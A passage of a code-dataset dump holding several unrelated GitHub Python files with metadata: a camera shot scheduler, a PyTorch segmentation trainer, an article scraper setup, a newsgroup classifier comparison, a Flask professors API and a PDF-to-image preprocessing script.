actual_time:\n self.shot_times.append(time_counter)\n\n def __get_settings_or_default(self):\n self.shot_days = []\n for day in self.days.keys():\n if(self.redis.hget('shot_time_settings', day) == '1'):\n self.shot_days.append(self.days[day])\n\n start_time_setting = self.redis.hget('shot_time_settings', 'start_time')\n if start_time_setting:\n if start_time_setting == 'sunrise':\n self.start_time = self.redis.hget('suntimes', 'sunrise')\n elif start_time_setting == 'civil':\n self.start_time = self.redis.hget('suntimes', 'civil_twilight_begin')\n elif start_time_setting == 'nautical':\n self.start_time = self.redis.hget('suntimes', 'nautical_twilight_begin')\n elif start_time_setting == 'astronomical':\n self.start_time = self.redis.hget('suntimes', 'astronomical_twilight_begin')\n elif start_time_setting == 'individual':\n hour = int(self.redis.hget('shot_time_settings', 'start_individual_hour'))\n minute = int(self.redis.hget('shot_time_settings', 'start_individual_minute'))\n self.start_time = datetime.now().replace(tzinfo=None).astimezone(tz=None).replace(hour=hour, minute=minute, second=0, microsecond=0)\n else:\n self.start_time = None\n else:\n self.start_time = self.redis.hget('suntimes', 'sunrise')\n\n if not self.start_time:\n self.start_time = datetime.now().replace(tzinfo=None).astimezone(tz=None)\n self.start_time = self.start_time.replace(hour=6, minute=0, second=0, microsecond=0)\n\n\n stop_time_setting = self.redis.hget('shot_time_settings', 'stop_time')\n\n if stop_time_setting:\n if stop_time_setting == 'sunset':\n self.stop_time = self.redis.hget('suntimes', 'sunset')\n elif stop_time_setting == 'civil':\n self.stop_time = self.redis.hget('suntimes', 'civil_twilight_end')\n elif stop_time_setting == 'nautical':\n self.stop_time = self.redis.hget('suntimes', 'nautical_twilight_end')\n elif stop_time_setting == 'astronomical':\n self.stop_time = self.redis.hget('suntimes', 'astronomical_twilight_end')\n elif stop_time_setting == 'individual':\n hour = int(self.redis.hget('shot_time_settings', 'stop_individual_hour'))\n minute = int(self.redis.hget('shot_time_settings', 'stop_individual_minute'))\n self.stop_time = datetime.now().replace(tzinfo=None).astimezone(tz=None).replace(hour=hour, minute=minute, second=0, microsecond=0)\n else:\n self.stop_time = None\n else:\n self.stop_time = self.redis.hget('suntimes', 'sunset')\n\n if not self.stop_time:\n self.stop_time = datetime.now().replace(tzinfo=None).astimezone(tz=None)\n self.stop_time = self.stop_time.replace(hour=21, minute=0, second=0, microsecond=0)\n\n try:\n self.interval = timedelta(minutes=int(self.redis.hget('shot_time_settings', 'interval')))\n except TypeError:\n self.interval = timedelta(minutes=15)\n\n def __make_nice_start_time(self):\n # floor start time to minutes\n self.start_time = self.start_time - timedelta(seconds=self.start_time.second)\n\n # floor to 30 minutes, if interval is mod 30\n if (self.interval.seconds / 60) % 30 == 0:\n self.start_time = self.start_time - timedelta(minutes=self.start_time.minute % 30)\n # floor to 15 minutes, if interval is mod 15\n elif (self.interval.seconds / 60) % 15 == 0:\n self.start_time = self.start_time - timedelta(minutes=self.start_time.minute % 15)\n # floor to 10 minutes, if interval is mod 5\n elif (self.interval.seconds / 60) % 5 == 0:\n self.start_time = self.start_time - timedelta(minutes=self.start_time.minute % 10)\n\n def write_to_redis(self):\n self.redis.delete('shot_times')\n\n for shot_time in self.shot_times:\n self.redis.rpush('shot_times', shot_time)\n", "repo_name": "siggdev/kmlabs_cameraControl", "sub_path": "library/ShotTimeCalculator.py", "file_name": "ShotTimeCalculator.py", "file_ext": "py", "file_size_in_byte": 5169, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "RedisDriver.RedisDriver", "line_number": 8, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 23, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 23, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 57, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 57, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 64, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 64, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 82, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 82, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 89, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 89, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 93, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 95, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 99, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 103, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 106, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 109, "usage_type": "call"}]} +{"seq_id": "73793669405", "text": "from voc_dataloader import VOC_Dataset\r\nfrom model import Segmentation_Model\r\nimport torch\r\nimport torch.nn as nn\r\nimport torch.optim as optim\r\nimport torch.nn.functional as F\r\nfrom torch.utils.data import DataLoader\r\nimport argparse\r\nimport sys\r\nimport numpy as np\r\nfrom torchvision import utils\r\n\r\nimport pdb\r\n\r\n\r\ndef cross_entropy2d(input, target):\r\n n, c, h, w = input.size()\r\n nt, ht, wt = target.size()\r\n\r\n if h != ht and w != wt: # upsample labels\r\n input = F.interpolate(input, size=(ht, wt), mode=\"bilinear\", align_corners=True)\r\n\r\n input_ = input.transpose(1, 2).transpose(2, 3).contiguous().view(-1, c)\r\n target = target.view(-1)\r\n loss = F.cross_entropy(input_, target) #+ 1e-2*torch.abs(torch.argmax(input, dim=1).view(-1) - target)\r\n\r\n return loss\r\n\r\ndef train(epoch, dataloader, model):\r\n avg_loss = 0\r\n for i, (img, ann) in enumerate(dataloader):\r\n img = img.to(device)\r\n ann = ann.to(device)\r\n\r\n pred = model(img)\r\n loss = cross_entropy2d(pred, ann)\r\n avg_loss += loss.item()\r\n optim.zero_grad()\r\n loss.backward()\r\n optim.step()\r\n\r\n sys.stdout.write('\\r Epoch: %3d [%d/%d] Loss: %8.4f'%(epoch, i, len(dataloader), loss.item()))\r\n pred_rgb, rgb_t = decode_pred(pred, ann)\r\n utils.save_image(torch.cat([img, pred_rgb/255., rgb_t/255.], dim=0), 'results/results_%d.jpeg'%i)\r\n print('\\n Average Loss:%4.3f'%(avg_loss/len(dataloader)))\r\n torch.save(model, 'checkpoints/model_%d.ckpt'%epoch)\r\n\r\ndef decode_pred(pred, target):\r\n pred = torch.argmax(pred, dim=1)\r\n target_mask = target.detach().cpu().numpy()\r\n label_mask = pred.detach().cpu().numpy()\r\n r = label_mask.copy()\r\n g = label_mask.copy()\r\n b = label_mask.copy()\r\n rt = target_mask.copy()\r\n gt = target_mask.copy()\r\n bt = target_mask.copy()\r\n for ll in range(0, 21):\r\n r[label_mask == ll] = label_colours[ll, 0]\r\n g[label_mask == ll] = label_colours[ll, 1]\r\n b[label_mask == ll] = label_colours[ll, 2]\r\n\r\n rt[target_mask == ll] = label_colours[ll, 0]\r\n gt[target_mask == ll] = label_colours[ll, 1]\r\n bt[target_mask == ll] = label_colours[ll, 2]\r\n\r\n \"\"\"\r\n rgb = np.zeros((label_mask.shape[0], label_mask.shape[1], 3))\r\n rgb[:, :, 0] = r / 255.0\r\n rgb[:, :, 1] = g / 255.0\r\n rgb[:, :, 2] = b / 255.0\r\n \"\"\"\r\n r = np.expand_dims(r, axis=1)\r\n g = np.expand_dims(g, axis=1)\r\n b = np.expand_dims(b, axis=1)\r\n rgb = np.concatenate((r, g, b), axis=1)\r\n rgb = torch.from_numpy(rgb)\r\n #rgb = rgb/255.0\r\n\r\n rt = np.expand_dims(rt, axis=1)\r\n gt = np.expand_dims(gt, axis=1)\r\n bt = np.expand_dims(bt, axis=1)\r\n rgbt = np.concatenate((rt, gt, bt), axis=1)\r\n rgbt = torch.from_numpy(rgbt)\r\n #rgbt = rgbt/255.0\r\n\r\n return rgb.to(device).type(torch.cuda.FloatTensor), rgbt.to(device).type(torch.cuda.FloatTensor)\r\n\r\n\r\n\r\n\r\ndef eval(dataloader, model):\r\n for i, (img, ann) in enumerate(dataloader):\r\n img = img.to(device)\r\n ann = ann.to(device)\r\n pred = model(img)\r\n label_colours = dataloader.dataset.get_pascal_labels()\r\n label_mask = pred.detach().cpu().numpy()\r\n print(label_mask)\r\n r = label_mask.copy()\r\n g = label_mask.copy()\r\n b = label_mask.copy()\r\n for ll in range(0, self.n_classes):\r\n r[label_mask == ll] = label_colours[ll, 0]\r\n g[label_mask == ll] = label_colours[ll, 1]\r\n b[label_mask == ll] = label_colours[ll, 2]\r\n rgb = np.zeros((label_mask.shape[0], label_mask.shape[1], 3))\r\n rgb[:, :, 0] = r / 255.0\r\n rgb[:, :, 1] = g / 255.0\r\n rgb[:, :, 2] = b / 255.0\r\n utils.save_image(torch.cat([img, pred, ann], dim=1), 'results.jpeg')\r\n\r\nif __name__ == '__main__':\r\n parser = argparse.ArgumentParser(description='Pytorch Implementation of Image Segmentation')\r\n parser.add_argument('--lr', default=1e-3, type=float)\r\n parser.add_argument('--batch-size', default=8, type=int)\r\n parser.add_argument('--epochs', default=200, type=int)\r\n args = parser.parse_args()\r\n print(args)\r\n\r\n device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\r\n dataset = VOC_Dataset()\r\n dataloader = DataLoader(dataset, batch_size = args.batch_size, shuffle=True, pin_memory=True)\r\n label_colours = dataset.get_pascal_labels()\r\n\r\n model = Segmentation_Model().to(device)\r\n optim = optim.Adam(model.parameters(), lr=args.lr, betas=(0.9, 0.99))\r\n\r\n for epoch in range(args.epochs):\r\n train(epoch, dataloader, model)", "repo_name": "DeokyunKim/Research_Project", "sub_path": "Image_Segmentation/train.py", "file_name": "train.py", "file_ext": "py", "file_size_in_byte": 4598, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "86", "api": [{"api_name": "torch.nn.functional.interpolate", "line_number": 21, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 21, "usage_type": "name"}, {"api_name": "torch.nn.functional.cross_entropy", "line_number": 25, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 25, "usage_type": "name"}, {"api_name": "torch.optim.zero_grad", "line_number": 38, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 38, "usage_type": "name"}, {"api_name": "torch.optim.step", "line_number": 40, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 40, "usage_type": "name"}, {"api_name": "sys.stdout.write", "line_number": 42, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 42, "usage_type": "attribute"}, {"api_name": "torchvision.utils.save_image", "line_number": 44, "usage_type": "call"}, {"api_name": "torchvision.utils", "line_number": 44, "usage_type": "name"}, {"api_name": "torch.cat", "line_number": 44, "usage_type": "call"}, {"api_name": "torch.save", "line_number": 46, "usage_type": "call"}, {"api_name": "torch.argmax", "line_number": 49, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 73, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 74, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 75, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 76, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 77, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 80, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 81, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 82, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 83, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 84, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 87, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 107, "usage_type": "call"}, {"api_name": "torchvision.utils.save_image", "line_number": 111, "usage_type": "call"}, {"api_name": "torchvision.utils", "line_number": 111, "usage_type": "name"}, {"api_name": "torch.cat", "line_number": 111, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 114, "usage_type": "call"}, {"api_name": "torch.device", "line_number": 121, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 121, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 121, "usage_type": "attribute"}, {"api_name": "voc_dataloader.VOC_Dataset", "line_number": 122, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 123, "usage_type": "call"}, {"api_name": "model.Segmentation_Model", "line_number": 126, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 127, "usage_type": "name"}, {"api_name": "torch.optim.Adam", "line_number": 127, "usage_type": "call"}, {"api_name": "model.parameters", "line_number": 127, "usage_type": "call"}]} +{"seq_id": "32408132377", "text": "import scraper\nimport json\nimport reccommendations\n\ndef main():\n # Start the scraper. The scraper combs designated sites for articles and performs some clustering algorithms on them.\n data = scraper.processData()\n \n #for cluster in data['clusters']:\n # for document in cluster['points']:\n # print(document['title'])\n # print(\"============================\")\n \n # Save the data to a text file, to be displayed by the frontend\n #with open('ArticleData.txt', 'w') as outfile:\n # json.dump(data, outfile)\n\n #with open('ArticleData.txt') as json_file:\n # data = json.load(json_file)\n \n for cluster in data['clusters']:\n for article in cluster['points']:\n reccs = []\n reccs = reccommendations.getReccomendations(article, cluster['points'])\n \n related = []\n for rec in reccs:\n related.append({'id': str(rec[1]['id']), 'title': rec[1]['title']})\n \n article.update({'related': related})\n \n # Create a tree structure that's easier for javascript to read\n articles = {}\n for cluster in data['clusters']:\n for document in cluster['points']:\n docPod = {\n 'title': document['title'],\n 'content': document['content'],\n 'related': document['related']\n }\n if str(document['id']) not in articles:\n articles.update({str(document['id']): docPod})\n\n #Save the data to a text file, to be displayed by the frontend\n with open('./FrontendFiles/bakedData.json', 'w') as outfile:\n json.dump(articles, outfile)\n \nmain()\n", "repo_name": "ezrabartlett/ArticleScraper", "sub_path": "setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 1683, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "scraper.processData", "line_number": 7, "usage_type": "call"}, {"api_name": "reccommendations.getReccomendations", "line_number": 24, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 46, "usage_type": "call"}]} +{"seq_id": "32280750123", "text": "# SYSTEM IMPORTS\nimport copy\nimport numpy\nimport os\nimport re\nfrom sklearn.datasets import fetch_20newsgroups\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.naive_bayes import MultinomialNB\nimport sys\n\n_current_dir_ = os.path.abspath(os.path.dirname(__file__))\n_src_dir_ = os.path.join(_current_dir_, \"..\", \"..\", \"..\")\n_naive_bayes_classifier_dir_ = os.path.join(_src_dir_, \"naive-bayes-classifier\")\n_dirs_to_add_ = [_current_dir_, _src_dir_, _naive_bayes_classifier_dir_]\nfor _dir_ in _dirs_to_add_:\n if _dir_ not in sys.path:\n sys.path.append(_dir_)\ndel _dirs_to_add_\ndel _naive_bayes_classifier_dir_\ndel _src_dir_\ndel _current_dir_\n\n\n# PYTHON PROJECT IMPORTS\nfrom mlpy.bayesian import text_classifier\nfrom mlpy.bayesian.stdlabels import discrete_label\n\nfrom naiveBayesClassifier import tokenizer\nfrom naiveBayesClassifier.trainer import Trainer\nfrom naiveBayesClassifier.classifier import Classifier\n\n\ncategories = [\"alt.atheism\", \"soc.religion.christian\", \"comp.graphics\", \"sci.med\"]\ntokenization_string = \"[\\\"'\\|_().,!-<>/\\\\=\\?\"\ndef word_filter(example):\n return [x for x in re.sub(str([tokenization_string]), \"\", example.lower()).split() if len(x) > 3]\n\n\ndef filter_data(data):\n new_data = list()\n for i in data:\n new_data.append(u\"%s\" % ' '.join(word_filter(i)))\n return new_data\n\n\ndef create_and_partition_dataset():\n training_set = fetch_20newsgroups(subset=\"train\", categories=categories, shuffle=True,\n random_state=42)\n validation_set = fetch_20newsgroups(subset=\"test\", categories=categories, shuffle=True,\n random_state=42)\n\n return (training_set.data, training_set.target),\\\n (validation_set.data, validation_set.target)\n\n\n# def convert_examples_to_text_classifier_using_sklearn(count_vectorizer, examples):\n# feature_vectors = list()\n# analyze_func = count_vectorizer.build_analyzer()\n# for example in examples:\n# feature_vectors.append(dict.fromkeys(analyze_func(example), 1.0))\n# return feature_vectors\n\n\ndef create_text_classifier(training_examples, training_annotations):\n print(\"creating text classifier\")\n class_label = discrete_label(\"type\", categories)\n # since actual annotations are in range of [1, 4] (all integers)\n # then to convert them to the appropriate label would be to subtract 1 from each\n training_annotations = [categories[x] for x in training_annotations]\n\n classifier = text_classifier()\n classifier.train(training_examples, training_annotations, class_label, word_filter)\n print(\"\\t->done\")\n return classifier\n\n\ndef create_sklearn_classifier(training_examples, training_annotations):\n print(\"creating sklearn classifier\")\n examples = filter_data(training_examples)\n count_vec = CountVectorizer(binary=True)\n\n examples = count_vec.fit_transform(examples)\n classifier = MultinomialNB().fit(examples, training_annotations)\n print(\"\\t->done\")\n return count_vec, classifier\n\n\ndef create_naive_bayes_classifier(training_examples, training_annotations):\n print(\"creating naive bayes classifier\")\n annotations = [categories[x] for x in training_annotations]\n\n news_trainer = Trainer(tokenizer.Tokenizer(stop_words=[], signs_to_remove=[tokenization_string]))\n for example, annotation in zip(training_examples, annotations):\n news_trainer.train(example, annotation)\n classifier = Classifier(news_trainer.data, tokenizer.Tokenizer(stop_words=[], signs_to_remove=[tokenization_string]))\n print(\"\\t->done\")\n return classifier\n\n\ndef test_text_classifier(classifier, validation_examples, validation_annotations):\n print(\"testing text classifier\")\n annotations = [categories[x] for x in validation_annotations]\n\n output_scores = list()\n for output_dist in classifier.classify_text(validation_examples):\n output_scores.append(categories[numpy.argmax(output_dist)])\n\n print(\"\\t->done\")\n return numpy.mean(numpy.array(annotations) == numpy.array(output_scores))\n\n\ndef test_sklearn_classifier(count_vec, classifier, validation_examples, validation_annotations):\n print(\"testing sklearn classifier\")\n examples = count_vec.transform(validation_examples)\n\n output_scores = classifier.predict(examples)\n print(\"\\t->done\")\n return numpy.mean(validation_annotations == output_scores)\n\n\ndef test_naive_bayes_classifier(classifier, validation_examples, validation_annotations):\n print(\"testing naive bayes classifier\")\n annotations = [categories[x] for x in validation_annotations]\n\n output_scores = list()\n for example in validation_examples:\n output_scores.append(classifier.classify(example)[0][0])\n # print(output_scores)\n print(\"\\t->done\")\n return numpy.mean(numpy.array(annotations) == numpy.array(output_scores))\n \n\ndef main():\n\n ## making training a validation sets\n training_set, validation_set = create_and_partition_dataset()\n training_examples, training_annotations = training_set\n validation_examples, validation_annotations = validation_set\n\n text_classifier = create_text_classifier(copy.deepcopy(training_examples),\n copy.deepcopy(training_annotations))\n count_vec, sklearn_classifier = create_sklearn_classifier(copy.deepcopy(training_examples),\n copy.deepcopy(training_annotations))\n nb_classifier = create_naive_bayes_classifier(copy.deepcopy(training_examples),\n copy.deepcopy(training_annotations))\n\n sklearn_accuracy = test_sklearn_classifier(count_vec, sklearn_classifier,\n copy.deepcopy(validation_examples),\n copy.deepcopy(validation_annotations))\n text_classifier_accuracy = test_text_classifier(text_classifier,\n copy.deepcopy(validation_examples),\n copy.deepcopy(validation_annotations))\n nb_accuracy = test_naive_bayes_classifier(nb_classifier,\n copy.deepcopy(validation_examples),\n copy.deepcopy(validation_annotations))\n print(\"text_classifier accuracy: %s\" % text_classifier_accuracy)\n print(\"sklearn accuracy: %s\" % sklearn_accuracy)\n print(\"nb_accuracy: %s\" % nb_accuracy)\n\n\nif __name__ == \"__main__\":\n main()\n\n", "repo_name": "aew61/mlpy", "sub_path": "src/mlpy/bayesian/test/compare_newsgroups_classifiers.py", "file_name": "compare_newsgroups_classifiers.py", "file_ext": "py", "file_size_in_byte": 6556, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "os.path.abspath", "line_number": 11, "usage_type": "call"}, {"api_name": "os.path", "line_number": 11, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 11, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path", "line_number": 12, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path", "line_number": 13, "usage_type": "attribute"}, {"api_name": "sys.path", "line_number": 16, "usage_type": "attribute"}, {"api_name": "sys.path.append", "line_number": 17, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 17, "usage_type": "attribute"}, {"api_name": "re.sub", "line_number": 36, "usage_type": "call"}, {"api_name": "sklearn.datasets.fetch_20newsgroups", "line_number": 47, "usage_type": "call"}, {"api_name": "sklearn.datasets.fetch_20newsgroups", "line_number": 49, "usage_type": "call"}, {"api_name": "mlpy.bayesian.stdlabels.discrete_label", "line_number": 66, "usage_type": "call"}, {"api_name": "mlpy.bayesian.text_classifier", "line_number": 71, "usage_type": "call"}, {"api_name": "sklearn.feature_extraction.text.CountVectorizer", "line_number": 80, "usage_type": "call"}, {"api_name": "sklearn.naive_bayes.MultinomialNB", "line_number": 83, "usage_type": "call"}, {"api_name": "naiveBayesClassifier.trainer.Trainer", "line_number": 92, "usage_type": "call"}, {"api_name": "naiveBayesClassifier.tokenizer.Tokenizer", "line_number": 92, "usage_type": "call"}, {"api_name": "naiveBayesClassifier.tokenizer", "line_number": 92, "usage_type": "name"}, {"api_name": "naiveBayesClassifier.classifier.Classifier", "line_number": 95, "usage_type": "call"}, {"api_name": "naiveBayesClassifier.tokenizer.Tokenizer", "line_number": 95, "usage_type": "call"}, {"api_name": "naiveBayesClassifier.tokenizer", "line_number": 95, "usage_type": "name"}, {"api_name": "numpy.argmax", "line_number": 106, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 109, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 109, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 118, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 130, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 130, "usage_type": "call"}, {"api_name": "mlpy.bayesian.text_classifier", "line_number": 140, "usage_type": "name"}, {"api_name": "copy.deepcopy", "line_number": 140, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 141, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 142, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 143, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 144, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 145, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 148, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 149, "usage_type": "call"}, {"api_name": "mlpy.bayesian.text_classifier", "line_number": 150, "usage_type": "argument"}, {"api_name": "copy.deepcopy", "line_number": 151, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 152, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 154, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 155, "usage_type": "call"}]} +{"seq_id": "12872343686", "text": "from controllers.user.professors import professors_controller\nfrom methods.auth import *\nfrom methods.errors import *\nfrom flask_restful import Resource, reqparse\nfrom flask import jsonify\n\ncontroller_object = professors_controller()\n\n\n# /professors/\nclass Professor(Resource):\n # method_decorators = {'get': [requires_auth('')]}\n\n def __init__(self):\n self.reqparse = reqparse.RequestParser()\n self.reqparse.add_argument('user_id', type=str, location='json')\n self.reqparse.add_argument('scientific_degree', type=str, location='json')\n\n def get(self, user_id):\n try:\n professor = controller_object.get_professor(user_id)\n except ErrorHandler as e:\n return e.error\n return jsonify({'professor': professor,\n 'status_code': 200})\n\n def put(self, user_id):\n args = self.reqparse.parse_args()\n professor = {'user_id': user_id, 'scientific_degree': args['scientific_degree']}\n try:\n controller_object.update_professor(user_id, professor)\n except ErrorHandler as e:\n return e.error\n return jsonify({\n 'professor': professor,\n 'message': 'professor updated successfully',\n 'status code': 200\n })\n\n def delete(self, user_id):\n try:\n professor = controller_object.delete_professor(user_id)\n except ErrorHandler as e:\n return e.error\n return jsonify({\n 'professor': professor,\n 'message': 'professor deleted successfully',\n 'status_code': 200\n })\n # Put and post methods are to be done\n\n\n# /professors\nclass Professors(Resource):\n def __init__(self):\n self.reqparse = reqparse.RequestParser()\n self.reqparse.add_argument('user_id', type=str, location='json')\n self.reqparse.add_argument('scientific_degree', type=str, location='json')\n\n def get(self):\n try:\n professrs = controller_object.get_all_professors()\n except ErrorHandler as e:\n return e.error\n return {\n 'total_professors': len(professrs),\n 'status_code': 200,\n 'professors': professrs\n }\n\n def post(self):\n args = self.reqparse.parse_args()\n\n new = {\n 'user_id': args['user_id'],\n 'scientific_degree': args['scientific_degree']}\n try:\n controller_object.post_professor(new)\n except ErrorHandler as e:\n return e.error\n return jsonify({'message': 'professor added successfully', 'status_code': 200})", "repo_name": "Graduation-Team-2021/LMS-Graduation-Project", "sub_path": "backend/views/user/professors.py", "file_name": "professors.py", "file_ext": "py", "file_size_in_byte": 2634, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "86", "api": [{"api_name": "controllers.user.professors.professors_controller", "line_number": 7, "usage_type": "call"}, {"api_name": "flask_restful.Resource", "line_number": 11, "usage_type": "name"}, {"api_name": "flask_restful.reqparse.RequestParser", "line_number": 15, "usage_type": "call"}, {"api_name": "flask_restful.reqparse", "line_number": 15, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 24, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 34, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 45, "usage_type": "call"}, {"api_name": "flask_restful.Resource", "line_number": 54, "usage_type": "name"}, {"api_name": "flask_restful.reqparse.RequestParser", "line_number": 56, "usage_type": "call"}, {"api_name": "flask_restful.reqparse", "line_number": 56, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 81, "usage_type": "call"}]} +{"seq_id": "23374733086", "text": "\"\"\"\nConvert a directory of PDFs to a directory\nof XML annotations.\n\"\"\"\nfrom time import sleep\nfrom os import mkdir, listdir\nfrom subprocess import call\nfrom glob import glob\nfrom os.path import splitext, join\nfrom multiprocessing import Pool\nfrom PIL import ImageOps, Image\nfrom functools import partial\n\n\ndef preprocess(input_dir, output_dir, args):\n \"\"\"\n script entry point\n :param input_dir: Path to directory of PDFs\n :param output_dir: Desired output directory for XML\n :return:\n \"\"\"\n # used to store intermediate PNGs\n\n try:\n mkdir(output_dir)\n pdf2png(input_dir, output_dir)\n except FileExistsError:\n print(\"output and tmp directories exist, overwriting...\")\n sleep(2)\n pad_pngs(output_dir, args[\"padding\"])\n\n\n\ndef pdf2png(input_dir, tmp_dir):\n \"\"\"\n Convert PDFs into a directory of PNGs\n :param input_dir:\n :return:\n \"\"\"\n # first we create all the directories we need\n files = glob(join(input_dir, \"*.pdf\"))\n\n def build_path(pdf_path):\n # take out input_dir\n pdf_path = pdf_path.split(\"/\")[1]\n return splitext(pdf_path)[0]\n\n dir_names = map(build_path, files)\n # this is more parallelizable than we're taking advantage of\n for name in dir_names:\n mkdir(join(tmp_dir, name))\n # now call ghostscript each file\n call([\"./ghost.sh\", name, f\"{join(input_dir,name)}.pdf\", tmp_dir])\n\n\ndef resize_png(path, size=1920):\n im = Image.open(path).convert('RGB')\n w, h = im.size\n if w >= size or h >= size:\n maxsize = (1920, 1920)\n im.thumbnail(maxsize, Image.ANTIALIAS)\n else:\n im = resize_image(im, size)\n return path,im\n\ndef pad_image(path, image=None, size=1920):\n im = Image.open(path).convert('RGB') if image is None else image\n w, h = im.size\n d_w = size - w\n d_h = size - h\n if d_h < 0 or d_w < 0:\n print(f'w: {w}, h: {h}')\n raise Exception(\"negative pad\")\n padding = (0,0,d_w, d_h)\n im_2 = ImageOps.expand(im, padding, fill=\"#fff\")\n return path,im_2\n\n\ndef resize_image(im, new_h):\n w,h = im.size\n if h > w:\n ratio = float(new_h)/h\n new_w = round(ratio*w)\n else:\n new_w = new_h\n ratio = float(new_w)/w\n new_h = round(ratio*h)\n im = im.resize((new_w, new_h), resample=Image.LANCZOS)\n return im\n\n\ndef pad_pngs(tmp_dir, padding):\n \"\"\"\n pad a directory of images\n :param tmp_dir:\n :return:\n \"\"\"\n pool = Pool(processes=4)\n dirs = listdir(tmp_dir)\n for dir in tqdm(dirs):\n pngs = glob(join(tmp_dir, dir, \"*.png\"))\n mapper = partial(pad_image, size=padding)\n images = pool.map(mapper, pngs)\n for path, image in tqdm(images):\n path = splitext(path)[0]\n image.save(f\"{path}.jpg\", \"jpeg\")\n\n\n\n\nif __name__ == \"__main__\":\n args = {\n \"padding\": 1920,\n \"collapse\": False,\n \"model_dir\": \"weights\"\n }\n preprocess(\"data\", \"out\", args)\n", "repo_name": "UW-COSMOS/Cosmos", "sub_path": "cosmos/ingestion/ingest/process/detection/src/torch_model/utils/preprocess.py", "file_name": "preprocess.py", "file_ext": "py", "file_size_in_byte": 2981, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 36, "dataset": "github-code", "pt": "86", "api": [{"api_name": "os.mkdir", "line_number": 25, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 29, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 41, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 41, "usage_type": "call"}, {"api_name": "os.path.splitext", "line_number": 46, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 51, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 51, "usage_type": "call"}, {"api_name": "subprocess.call", "line_number": 53, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 53, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 57, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 57, "usage_type": "name"}, {"api_name": "PIL.Image.ANTIALIAS", "line_number": 61, 